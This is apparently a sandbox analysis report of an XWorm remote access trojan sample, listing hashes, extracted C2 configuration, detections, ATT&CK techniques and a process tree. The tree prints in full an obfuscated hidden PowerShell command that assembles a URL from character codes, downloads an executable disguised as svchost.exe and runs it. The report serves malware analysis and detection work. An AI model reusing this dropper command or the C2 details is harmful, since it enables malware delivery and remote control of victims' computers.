xworm | 59ae3f7403be6eb6d175e19fccc41998188e27419b4f1e3bc9e2e36f123fc36a

General

Target

Output.exe
Size

127KB
MD5

c5a8c92a6eae175507942fcdb7b6f4d7
SHA1

b75512ae6d1da96e091a657deb49f6047e696bb4
SHA256

59ae3f7403be6eb6d175e19fccc41998188e27419b4f1e3bc9e2e36f123fc36a
SHA512

0796a4886d9e0f078f9a6a1e324cdfbbbfde1a991e2c2be4d764db12980f8b4b6ca743d707a1561587df4dc9d78fb71bf17cb21d3e886e1ccee28a913c44f592
SSDEEP

3072:e274NpVq8BxFRzaqF+o2GQJ7/JzqVfGv2:eegVqwlL

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

show-commentary.gl.at.ply.gg:19243

Mutex

TJBpUvAwYAstsP7U

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x001b00000002aeb8-24.dat	family_xworm
behavioral2/memory/1028-31-0x0000000000340000-0x000000000034E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	4988	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4988	powershell.exe
4988	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1028	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4988	powershell.exe
4988	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4988	powershell.exe
Token: SeDebugPrivilege	1028	svchost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4080 wrote to memory of 4060	4080	Output.exe	78
PID 4080 wrote to memory of 4060	4080	Output.exe	78
PID 4060 wrote to memory of 4988	4060	cmd.exe	80
PID 4060 wrote to memory of 4988	4060	cmd.exe	80
PID 4988 wrote to memory of 1028	4988	powershell.exe	81
PID 4988 wrote to memory of 1028	4988	powershell.exe	81

C:\Users\Admin\AppData\Local\Temp\Output.exe
"C:\Users\Admin\AppData\Local\Temp\Output.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SecorKit.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]104);$url+=([char]116);$url+=([char]116);$url+=([char]112);$url+=([char]115);$url+=([char]58);$url+=([char]47);$url+=([char]47);$url+=([char]102);$url+=([char]105);$url+=([char]108);$url+=([char]101);$url+=([char]115);$url+=([char]46);$url+=([char]99);$url+=([char]97);$url+=([char]116);$url+=([char]98);$url+=([char]111);$url+=([char]120);$url+=([char]46);$url+=([char]109);$url+=([char]111);$url+=([char]101);$url+=([char]47);$url+=([char]115);$url+=([char]50);$url+=([char]54);$url+=([char]53);$url+=([char]107);$url+=([char]111);$url+=([char]46);$url+=([char]115);$url+=([char]101);$url+=([char]99);$url+=([char]114);$url+=([char]111);$url+=([char]52);$url+=([char]50);$url+=([char]56);$url+=([char]56);$url+=([char]49);$url+=([char]53);$url+=([char]54);$url+=([char]52);$url+=([char]52);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Users\Public\svchost.exe
      "C:\Users\Public\svchost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SecorKit.bat

Filesize
4KB

MD5
bc1626613575b1b6f297de25534b5558

SHA1
3e09f43f58461e7ae1da21a3a7401e802c9501db

SHA256
bf212323f92dd7b684fd7b61fdc56b984d48396d80022aacb5b803031d454000

SHA512
7b736f2416e0354661805ce06bf05e4515d56ab4a2dc4f6118df6d86053742064f867c762a251c06eee548cbc46ba5e788a8b49a6e59bafdb4e7d662776d869f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uqdae3gg.rpb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\svchost.exe

Filesize
30KB

MD5
5cf4a1f272de59123997ab014820da98

SHA1
2e18de3b11979fffbb7ba990b32ec37d9e528cb0

SHA256
0df47fd491c9bf62e9948b9a952d75d2ca4cdeeca696ac71ccd1016a9f348b19

SHA512
44c21ebc2cc4f5a665f2388d1ba00d30d8e0b0569069fc12eed33b463820027ad6e135777d8feb245c9f2e3f4f2c128a7f8b18e531f8d7ed2d68078ad2f575fd

Download Submit
memory/1028-31-0x0000000000340000-0x000000000034E000-memory.dmp

Filesize
56KB

Download
memory/4080-1-0x0000000000350000-0x0000000000376000-memory.dmp

Filesize
152KB

Download
memory/4080-0-0x00007FF852133000-0x00007FF852135000-memory.dmp

Filesize
8KB

Download
memory/4988-15-0x0000025365C50000-0x0000025365C72000-memory.dmp

Filesize
136KB

Download
memory/4988-16-0x00007FF852130000-0x00007FF852BF2000-memory.dmp

Filesize
10.8MB

Download
memory/4988-17-0x00007FF852130000-0x00007FF852BF2000-memory.dmp

Filesize
10.8MB

Download
memory/4988-18-0x00007FF852130000-0x00007FF852BF2000-memory.dmp

Filesize
10.8MB

Download
memory/4988-19-0x00007FF852130000-0x00007FF852BF2000-memory.dmp

Filesize
10.8MB

Download
memory/4988-32-0x00007FF852130000-0x00007FF852BF2000-memory.dmp

Filesize
10.8MB

Download
memory/4988-33-0x00007FF852130000-0x00007FF852BF2000-memory.dmp

Filesize
10.8MB

Download
memory/4988-34-0x00007FF852130000-0x00007FF852BF2000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing